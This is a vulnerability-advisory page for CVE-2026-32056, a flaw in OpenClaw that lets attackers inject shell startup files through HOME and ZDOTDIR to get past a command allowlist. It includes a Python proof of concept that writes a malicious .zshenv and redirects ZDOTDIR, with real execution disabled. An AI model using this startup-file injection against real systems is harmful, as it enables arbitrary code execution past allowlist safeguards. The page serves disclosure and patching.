Security Vulnerability Report
CVE-2026-32056 CVSS 7.5 HIGH

Published: 2026-03-21 01:17:09
Last Modified: 2026-03-23 19:00:00

Description

OpenClaw versions prior to 2026.2.22 fail to sanitize shell startup environment variables HOME and ZDOTDIR in the system.run function, allowing attackers to bypass command allowlist protections. Remote attackers can inject malicious startup files such as .bash_profile or .zshenv to achieve arbitrary code execution before allowlist-evaluated commands are executed.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Other scores carried in the record for this CVE:
- CVSS 3.1 (Primary): 9.8 CRITICAL, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (exploitability 3.9, impact 5.9)
- CVSS 3.1 (Secondary): 7.5 HIGH, vector above (exploitability 1.6, impact 5.9)
- CVSS 4.0 (Secondary): 7.7 HIGH, vector CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Weakness: CWE-78 (Improper Neutralization of Special Elements used in an OS Command, 'OS Command Injection')

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os


# Simulate the vulnerable system.run function in OpenClaw
def vulnerable_system_run(command):
    # The system checks the allowlist for the command
    print(f"[*] Allowlist check passed for command: {command}")
    # Vulnerability: the function calls a shell without sanitizing HOME/ZDOTDIR.
    # Ideally it should clean the environment or use a restricted shell.
    shell = "/bin/zsh"  # Assuming zsh for this example as it uses ZDOTDIR
    # Execute the command (in a real scenario, this spawns a subprocess).
    # The shell will load ZDOTDIR/.zshenv before running the command.
    print(f"[*] Executing command via {shell}...")
    # os.system(command)  # Actual execution (disabled: this script only simulates the call)


def main():
    print("[+] CVE-2026-32056 PoC: OpenClaw RCE via Shell Startup Env Injection")

    # 1. Set up the malicious environment
    malicious_dir = "/tmp/evil_openclaw"
    if not os.path.exists(malicious_dir):
        os.makedirs(malicious_dir)

    # 2. Create the malicious startup file
    payload_file = os.path.join(malicious_dir, ".zshenv")
    with open(payload_file, "w") as f:
        # This code runs BEFORE the allowlisted command
        f.write("echo 'Arbitrary Code Execution (ACE) achieved!'\n")
        f.write("touch /tmp/pwned_by_openclaw\n")
    print(f"[*] Created malicious payload at: {payload_file}")

    # 3. Exploit: point the environment variable at the malicious directory.
    # In a real attack, this would be done via the remote attack vector.
    os.environ["ZDOTDIR"] = malicious_dir
    print(f"[*] Set ZDOTDIR to: {malicious_dir}")

    # 4. Trigger the vulnerability with an allowlisted command (e.g., 'ls').
    # The attacker calls system.run('ls').
    vulnerable_system_run("ls")
    # Since the shell call above is simulated, the proof file only appears
    # if the execution line in vulnerable_system_run is enabled.
    print("[*] Check /tmp/pwned_by_openclaw for proof of execution")


if __name__ == "__main__":
    main()
```

References

- Patch: https://github.com/openclaw/openclaw/commit/c2c7114ed39a547ab6276e1e933029b9530ee906
- Vendor Advisory: https://github.com/openclaw/openclaw/security/advisories/GHSA-xgf2-vxv2-rrmg
- Third Party Advisory: https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-shell-startup-environment-variable-injection-in-system-run
